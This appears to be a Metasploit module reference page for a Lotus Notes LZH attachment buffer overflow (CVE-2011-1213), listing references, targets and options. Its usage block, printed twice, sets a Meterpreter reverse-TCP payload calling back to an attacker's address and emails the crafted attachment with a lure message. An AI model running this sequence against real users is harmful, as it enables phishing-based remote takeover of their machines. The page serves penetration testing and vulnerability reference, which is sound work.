Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net
Exploit Rank
- Normal
Exploit Authors
- binaryhouse.net < >
- alino < 26alino [at] gmail.com >
Vulnerability References
- CVE-2011-1213
- OSVDB-72706
- BID-48018
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904
- http://www.ibm.com/support/docview.wss?uid=swg21500034
Exploit Targets
- 0 - Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal (default)
- 1 - Lotus Notes 8.5.2 FP2 / Windows Universal / DEP
Exploit Development
Similar Exploit Modules
- exploit/windows/lotus/domino_http_accept_language
- exploit/windows/lotus/domino_icalendar_organizer
- exploit/windows/lotus/domino_sametime_stmux
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/lotus/lotusnotes_lzh
msf exploit(lotusnotes_lzh) > show payloads
msf exploit(lotusnotes_lzh) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(lotusnotes_lzh) > set LHOST [MY IP ADDRESS]
msf exploit(lotusnotes_lzh) > set MAILTO [STRING]
msf exploit(lotusnotes_lzh) > set RHOST [TARGET IP]
msf exploit(lotusnotes_lzh) > set SUBJECT [STRING]
msf exploit(lotusnotes_lzh) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/lotus/lotusnotes_lzh
msf exploit(lotusnotes_lzh) > show payloads
msf exploit(lotusnotes_lzh) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(lotusnotes_lzh) > set LHOST [MY IP ADDRESS]
msf exploit(lotusnotes_lzh) > set MAILTO [STRING]
msf exploit(lotusnotes_lzh) > set RHOST [TARGET IP]
msf exploit(lotusnotes_lzh) > set SUBJECT [STRING]
msf exploit(lotusnotes_lzh) > exploit
Exploit Module Options
| FILENAME | Sets the attachment file name (default: data.lzh) |
| MAILFROM | The FROM address of the e-mail (default: random@example.com) |
| MAILTO | The TO address of the email |
| MESSAGE | Email message text (default: Important message, please view attachment!) |
| PASSWORD | SMTP Password for sending email |
| RHOST | The SMTP server to send through |
| RPORT | The SMTP server port (e.g. 25, 465, 587, 2525) (default: 25) |
| SUBJECT | Subject line of the email |
| USERNAME | SMTP Username for sending email |
| VERBOSE | Display verbose information |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExitOnSession | Return from the exploit after a session has been created |
| ListenerTimeout | The maximum number of seconds to wait for new sessions |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
